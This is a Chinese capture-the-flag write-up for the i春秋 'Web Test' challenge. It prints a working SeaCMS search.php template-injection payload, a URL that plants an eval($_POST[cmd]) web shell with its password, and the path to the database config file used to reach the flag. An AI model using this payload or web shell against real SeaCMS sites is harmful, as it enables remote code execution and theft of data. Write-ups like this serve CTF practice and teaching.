i春秋CTF训练 Web Test

Web Test

题目内容:善于查资料,你就可以拿一血了。

题目链接请在i春秋申请


根据提示直接在搜索引擎上查询海洋cms漏洞,发现曾经有过前台getshell,用poc试一下

searchtype=5&searchword={if{searchpage:year}&year=:e{searchpage:area}}&area=v{searchpage:letter}&letter=al{searchpage:lang}&yuyan=(join{searchpage:jq}&jq=($_P{searchpage:ver}&&ver=OST[9]))&9[]=ph&9[]=pinfo();

在这里插入图片描述

执行成功,可以直接上传一句话,使用蚁剑连接

url地址:http://eci-2zeinawvsdkxjfr63efa.cloudeci.ichunqiu.com/search.php?searchtype=5&tid=&area=eval($_POST[cmd])
连接密码:cmd

找了好久终于找到数据库配置文件,/var/www/html/data/common.inc.php

在这里插入图片描述

鼠标右击这条shell,选择数据操作,添加上面的数据库用户名和密码连接数据库

在这里插入图片描述

然后在seacms库里发现flag,执行sql命令得到flag

SELECT * FROM `flag_140ad2e0d8cb` ORDER BY 1 DESC LIMIT 0,20;
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值